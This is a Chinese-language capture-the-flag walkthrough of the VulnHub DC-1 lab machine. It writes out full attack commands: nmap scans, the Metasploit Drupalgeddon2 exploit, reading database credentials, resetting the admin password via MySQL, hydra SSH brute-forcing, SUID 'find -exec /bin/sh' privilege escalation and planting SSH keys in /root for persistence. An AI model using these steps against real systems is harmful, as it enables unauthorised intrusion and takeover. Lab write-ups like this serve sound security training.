环境:www.vulnhub.com下载靶机
VMware导入虚拟机
1.把dc1的网络设置为nat模式,记录一下mac地址 。把kali也设置为nat模式
用kali扫描发现主机。
先看自己的IP地址:ifconfig
扫描命令:nmap -sP 192.168.71.0/24 ,发现有dc1的IP地址是:192.168.71.135
nmap -A 192.168.71.135 查看这个操作系统是什么,开放了什么端口等
用浏览器访问这个地址。发现可以打开。并且是一个cms内容管理系统。叫 drupal
查看网址有没有robots.txt文件。http://192.168.71.135/robots.txt
2.漏洞发现
用metasploit framework 扫描发现漏洞
启动 metasploit :msfconsole
/**
msf5 > search drupal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
1 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
3 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
4 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
5 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
6 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
**/
发现7个可以利用的漏洞。找一个比较新的。并且是成功级别比较高的。
use exploit/unix/webapp/drupal_drupalgeddon2
/**
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.71.135
RHOSTS => 192.168.71.135
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set VHOST 192.168.71.141
VHOST => 192.168.71.141
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
meterpreter>
**/
出现 meterpreter 说明已经进到了服务器了。可以看一下help命令
shell 进入shell
ls 看到当前flag1.txt
===
<pre>cat flag1.txt
Every good CMS needs a config file - and so do you.
</pre>
===
把下面的保存为pwd.txt
john pwd.txt
flag4:$6$Nk47pS8q$vTXHYXBFqOoZERNGFThbnZfi5LN0ucGZe05VMtMuIFyqYzY/eVbPNMZ7lpfRVc0BYrQ0brAhJoEzoEWCKxVW80
网址目录进入到:cat sites/default/settings.php 发现flag2
===
**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
上面的话提示。说要不一定要暴力破解网站的管理员。可以想其他的办法。
直接进数据库看
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
===
同时发现了连接数据的信息
用python 打开shell
python -c 'import pty;pty.spawn("/bin/bash")'
构建连接数据库的语句 mysql -udbuser -pR0ck3t
cd /var/www/
php scripts/password-hash.sh admin #生成密码为 admin
update users set pass='$S$DhbcpLhyAcXB8jKvGBqS9hbWWSOIACm1nQpvwZt7ZGjK3WFC2stw' where name="admin"
$S$DhbcpLhyAcXB8jKvGBqS9hbWWSOIACm1nQpvwZt7ZGjK3WFC2stw
登录
flag3
Primary tabs
View(active tab)
Edit
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
使用九头蛇爆破密码。
root@kali:/usr/share/john# hydra ssh://192.168.71.135 -l flag4 -P /usr/share/john/password.lst -t 50 -f
爆破后的密码是:flag4:orange
[22][ssh] host: 192.168.71.135 login: flag4 password: orange
find -exec "/bin/sh" \;
id 查看自己的id。发现已经是root
cd /root
ls
cat thefinalflag.txt
# cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
查找系统中具有suid权限的命令:
find / -perm -4000 2>/dev/null
到这里就满足了吗?当然不是。
本地连接flag 用户。设置为免密登录
ssh-keygen 一直确定确定确定。会在自己用户的家目录出现.ssh/id_rsa .ssh/id_rsa.pub
ssh-copy-id -i id_rsa.pub flag4@192.168.71.135 输入yes,输入orange 密码。
执行完后。会在flag4的家目录出现.ssh/authorized_keys 这个文件。这个就是免密登录的密钥了。
find -exec "/bin/bash" \;
cd /root
mkdir /root/.ssh
cp /home/flag4/.ssh/authorized_keys /root/.ssh/
然后就可以实现 本地免密登录到root 了
ssh root@192.168.71.135